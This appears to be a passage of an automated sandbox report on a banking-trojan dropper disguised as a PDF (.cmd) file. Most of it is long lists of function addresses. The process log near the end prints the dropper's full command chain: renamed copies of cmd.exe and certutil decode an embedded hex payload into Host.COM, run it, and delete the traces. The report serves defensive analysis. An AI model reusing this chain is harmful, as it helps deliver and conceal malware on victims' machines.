    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7196718D46_2_00007FF7196718D4
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF719663F906_2_00007FF719663F90
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF719665B706_2_00007FF719665B70
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF719669B506_2_00007FF719669B50
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF71966372C6_2_00007FF71966372C
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7196634106_2_00007FF719663410
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF719666BE06_2_00007FF719666BE0
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF71968AFBC6_2_00007FF71968AFBC
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD1CCB87_2_00007FF68AD1CCB8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD1F0207_2_00007FF68AD1F020
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC42F387_2_00007FF68AC42F38
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD1BC107_2_00007FF68AD1BC10
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD1C1207_2_00007FF68AD1C120
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD438007_2_00007FF68AD43800
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC3AC087_2_00007FF68AC3AC08
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC7CBFC7_2_00007FF68AC7CBFC
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC80C287_2_00007FF68AC80C28
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACA8BD47_2_00007FF68ACA8BD4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACE6B947_2_00007FF68ACE6B94
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC54B687_2_00007FF68AC54B68
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC8CD107_2_00007FF68AC8CD10
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACC2CF87_2_00007FF68ACC2CF8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC48D007_2_00007FF68AC48D00
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC88D2C7_2_00007FF68AC88D2C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC92D187_2_00007FF68AC92D18
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD28CF47_2_00007FF68AD28CF4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACACC807_2_00007FF68ACACC80
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACCCCA87_2_00007FF68ACCCCA8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD3CC8C7_2_00007FF68AD3CC8C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD08C587_2_00007FF68AD08C58
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBAA007_2_00007FF68ACBAA00
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD0A9F07_2_00007FF68AD0A9F0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC9E9F07_2_00007FF68AC9E9F0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC909EC7_2_00007FF68AC909EC
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC889907_2_00007FF68AC88990
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC969847_2_00007FF68AC96984
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC329407_2_00007FF68AC32940
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC84B307_2_00007FF68AC84B30
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACB6A847_2_00007FF68ACB6A84
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBEA7C7_2_00007FF68ACBEA7C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD24A587_2_00007FF68AD24A58
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD1AA587_2_00007FF68AD1AA58
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD04A407_2_00007FF68AD04A40
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC310307_2_00007FF68AC31030
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD4F947_2_00007FF68ACD4F94
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC64F907_2_00007FF68AC64F90
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACF511C7_2_00007FF68ACF511C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC8D0947_2_00007FF68AC8D094
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC7107C7_2_00007FF68AC7107C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC4B09C7_2_00007FF68AC4B09C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACA6D7C7_2_00007FF68ACA6D7C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC5EDA47_2_00007FF68AC5EDA4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD12D6C7_2_00007FF68AD12D6C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC58F1C7_2_00007FF68AC58F1C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC6EED47_2_00007FF68AC6EED4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC36EF47_2_00007FF68AC36EF4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD18EAC7_2_00007FF68AD18EAC
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD14E587_2_00007FF68AD14E58
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACB84147_2_00007FF68ACB8414
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC544107_2_00007FF68AC54410
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD1E4307_2_00007FF68AD1E430
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD4842F7_2_00007FF68AD4842F
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC3A4247_2_00007FF68AC3A424
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACC43D07_2_00007FF68ACC43D0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC903987_2_00007FF68AC90398
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC7E3A07_2_00007FF68AC7E3A0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACC63747_2_00007FF68ACC6374
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD1234C7_2_00007FF68AD1234C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC3C5207_2_00007FF68AC3C520
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD184D87_2_00007FF68AD184D8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACA24D47_2_00007FF68ACA24D4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBE4F07_2_00007FF68ACBE4F0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC444E07_2_00007FF68AC444E0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACC84887_2_00007FF68ACC8488
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC884847_2_00007FF68AC88484
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC764A87_2_00007FF68AC764A8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD104907_2_00007FF68AD10490
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACAA4507_2_00007FF68ACAA450
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACAC4507_2_00007FF68ACAC450
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD441F87_2_00007FF68AD441F8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACF821C7_2_00007FF68ACF821C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC8C1D07_2_00007FF68AC8C1D0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBA1E87_2_00007FF68ACBA1E8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC501407_2_00007FF68AC50140
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC381707_2_00007FF68AC38170
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC5227C7_2_00007FF68AC5227C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACA62807_2_00007FF68ACA6280
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC8E29C7_2_00007FF68AC8E29C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD142747_2_00007FF68AD14274
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACB27D07_2_00007FF68ACB27D0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACE07D07_2_00007FF68ACE07D0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBC7F07_2_00007FF68ACBC7F0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD267507_2_00007FF68AD26750
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD148C47_2_00007FF68AD148C4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD108C87_2_00007FF68AD108C8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBE8447_2_00007FF68ACBE844
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD228547_2_00007FF68AD22854
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC986307_2_00007FF68AC98630
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACFC6307_2_00007FF68ACFC630
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD385EC7_2_00007FF68AD385EC
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC405E07_2_00007FF68AC405E0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD285A87_2_00007FF68AD285A8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACCE57C7_2_00007FF68ACCE57C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC825807_2_00007FF68AC82580
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD045387_2_00007FF68AD04538
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC685707_2_00007FF68AC68570
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC9655C7_2_00007FF68AC9655C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACAC6F87_2_00007FF68ACAC6F8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC9C6D07_2_00007FF68AC9C6D0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACE3C107_2_00007FF68ACE3C10
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC8FC347_2_00007FF68AC8FC34
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC6FC207_2_00007FF68AC6FC20
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC59BC87_2_00007FF68AC59BC8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC9DBF07_2_00007FF68AC9DBF0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACA1B847_2_00007FF68ACA1B84
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC3FB847_2_00007FF68AC3FB84
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC35BA47_2_00007FF68AC35BA4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACDFB507_2_00007FF68ACDFB50
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACC7B747_2_00007FF68ACC7B74
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC45D087_2_00007FF68AC45D08
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC6DD207_2_00007FF68AC6DD20
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC69CD07_2_00007FF68AC69CD0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACF9CC07_2_00007FF68ACF9CC0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC8BCE87_2_00007FF68AC8BCE8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACB1C907_2_00007FF68ACB1C90
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD3FC907_2_00007FF68AD3FC90
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC4BCA47_2_00007FF68AC4BCA4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC83C607_2_00007FF68AC83C60
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC31A107_2_00007FF68AC31A10
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC5F9B87_2_00007FF68AC5F9B8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBF9907_2_00007FF68ACBF990
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACB19AC7_2_00007FF68ACB19AC
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD279387_2_00007FF68AD27938
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD2994C7_2_00007FF68AD2994C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACFBB287_2_00007FF68ACFBB28
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC97AC87_2_00007FF68AC97AC8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC47AB47_2_00007FF68AC47AB4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACABA487_2_00007FF68ACABA48
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC63A407_2_00007FF68AC63A40
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACE9A587_2_00007FF68ACE9A58
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC81A607_2_00007FF68AC81A60
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACE9FF87_2_00007FF68ACE9FF8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC980187_2_00007FF68AC98018
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC31F807_2_00007FF68AC31F80
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC9C0B87_2_00007FF68AC9C0B8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD020847_2_00007FF68AD02084
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC680807_2_00007FF68AC68080
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC65DF77_2_00007FF68AC65DF7
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACC1E2C7_2_00007FF68ACC1E2C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC41DE87_2_00007FF68AC41DE8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD3DD847_2_00007FF68AD3DD84
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACCBDA07_2_00007FF68ACCBDA0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC91D707_2_00007FF68AC91D70
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACE7D707_2_00007FF68ACE7D70
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC89D6C7_2_00007FF68AC89D6C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACC5F047_2_00007FF68ACC5F04
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC81ED07_2_00007FF68AC81ED0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACB9EE47_2_00007FF68ACB9EE4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBDEB07_2_00007FF68ACBDEB0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC8DEA47_2_00007FF68AC8DEA4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBBE707_2_00007FF68ACBBE70
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACAD4107_2_00007FF68ACAD410
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC373F87_2_00007FF68AC373F8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC7F4347_2_00007FF68AC7F434
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD233D07_2_00007FF68AD233D0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD333D47_2_00007FF68AD333D4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD1B3AC7_2_00007FF68AD1B3AC
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC673407_2_00007FF68AC67340
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC5B36C7_2_00007FF68AC5B36C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACAF5207_2_00007FF68ACAF520
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD014F07_2_00007FF68AD014F0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACE94947_2_00007FF68ACE9494
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD294A87_2_00007FF68AD294A8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC974787_2_00007FF68AC97478
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC554A07_2_00007FF68AC554A0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC354387_2_00007FF68AC35438
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC7D4407_2_00007FF68AC7D440
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACDD4607_2_00007FF68ACDD460
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC811C87_2_00007FF68AC811C8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC4D1B87_2_00007FF68AC4D1B8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC831E07_2_00007FF68AC831E0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBF1687_2_00007FF68ACBF168
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACC53187_2_00007FF68ACC5318
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC8D2C07_2_00007FF68AC8D2C0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC992C47_2_00007FF68AC992C4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC3F2C07_2_00007FF68AC3F2C0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACA92D87_2_00007FF68ACA92D8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACE52907_2_00007FF68ACE5290
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD0D2B47_2_00007FF68AD0D2B4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC4F8007_2_00007FF68AC4F800
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC518307_2_00007FF68AC51830
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACE38207_2_00007FF68ACE3820
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC717D47_2_00007FF68AC717D4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACA77C87_2_00007FF68ACA77C8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC9D7F07_2_00007FF68AC9D7F0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC897907_2_00007FF68AC89790
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC4B7887_2_00007FF68AC4B788
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACB37607_2_00007FF68ACB3760
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC858CC7_2_00007FF68AC858CC
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC978907_2_00007FF68AC97890
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACC184C7_2_00007FF68ACC184C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD038747_2_00007FF68AD03874
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACCD8587_2_00007FF68ACCD858
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC3F6107_2_00007FF68AC3F610
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACB95FC7_2_00007FF68ACB95FC
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC955F07_2_00007FF68AC955F0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC6B58C7_2_00007FF68AC6B58C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD095807_2_00007FF68AD09580
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC6156C7_2_00007FF68AC6156C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD0D6DC7_2_00007FF68AD0D6DC
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBF6D87_2_00007FF68ACBF6D8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACE76787_2_00007FF68ACE7678
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD176787_2_00007FF68AD17678
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC876B07_2_00007FF68AC876B0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACED6A07_2_00007FF68ACED6A0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC756487_2_00007FF68AC75648
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD136387_2_00007FF68AD13638
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD056607_2_00007FF68AD05660
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC5D6607_2_00007FF68AC5D660
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02AA20C411_2_02AA20C4
    Source: C:\Users\Public\Libraries\Host.COMCode function: String function: 02AA4500 appears 33 times
    Source: C:\Users\Public\Libraries\Host.COMCode function: String function: 02AA4860 appears 949 times
    Source: C:\Users\Public\Libraries\Host.COMCode function: String function: 02AB8954 appears 56 times
    Source: C:\Users\Public\Libraries\Host.COMCode function: String function: 02AA44DC appears 74 times
    Source: C:\Users\Public\Libraries\Host.COMCode function: String function: 02AB89D8 appears 45 times
    Source: C:\Users\Public\Libraries\Host.COMCode function: String function: 02AA46D4 appears 244 times
    Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF719673448 appears 36 times
    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68ACF7D70 appears 35 times
    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68ACF7BAC appears 34 times
    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68ACCEB98 appears 93 times
    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68AC6BC9C appears 280 times
    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68AC3D1C8 appears 41 times
    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68AD464A6 appears 173 times
    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68AD3F1B8 appears 183 times
    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68AD3F11C appears 37 times
    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68ACF0D10 appears 181 times
    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68ACEABFC appears 818 times
    Source: classification engineClassification label: mal100.bank.troj.evad.winCMD@22/11@1/1
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7196632B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError,4_2_00007FF7196632B0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD1826C GetCurrentThread,GetLastError,#357,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,CloseHandle,7_2_00007FF68AD1826C
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF71968FB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z,4_2_00007FF71968FB54
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC54B68 SysAllocString,#357,SysAllocString,VariantInit,CoInitializeEx,CoCreateInstance,VariantInit,#357,OpenEventW,GetLastError,#359,OpenEventW,GetLastError,#359,PulseEvent,GetLastError,#357,CloseHandle,CoUninitialize,SysFreeString,SysFreeString,7_2_00007FF68AC54B68
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACF6320 FindResourceW,GetLastError,#357,LoadResource,GetLastError,LockResource,GetLastError,7_2_00007FF68ACF6320
    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:120:WilError_03
    Source: C:\Users\Public\Libraries\Host.COMKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Windows\System32\extrac32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: 78326473_PDF.cmdReversingLabs: Detection: 18%
    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\78326473_PDF.cmd" "
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
    Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\78326473_PDF.cmd" "C:\\Users\\Public\\Host.GIF" 3
    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\78326473_PDF.cmd" "C:\\Users\\Public\\Host.GIF" 3
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10
    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\Host.COM C:\Users\Public\Libraries\Host.COM
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Host.GIF" / A / F / Q / S
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\78326473_PDF.cmd" "C:\\Users\\Public\\Host.GIF" 3 Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10 Jump to behavior
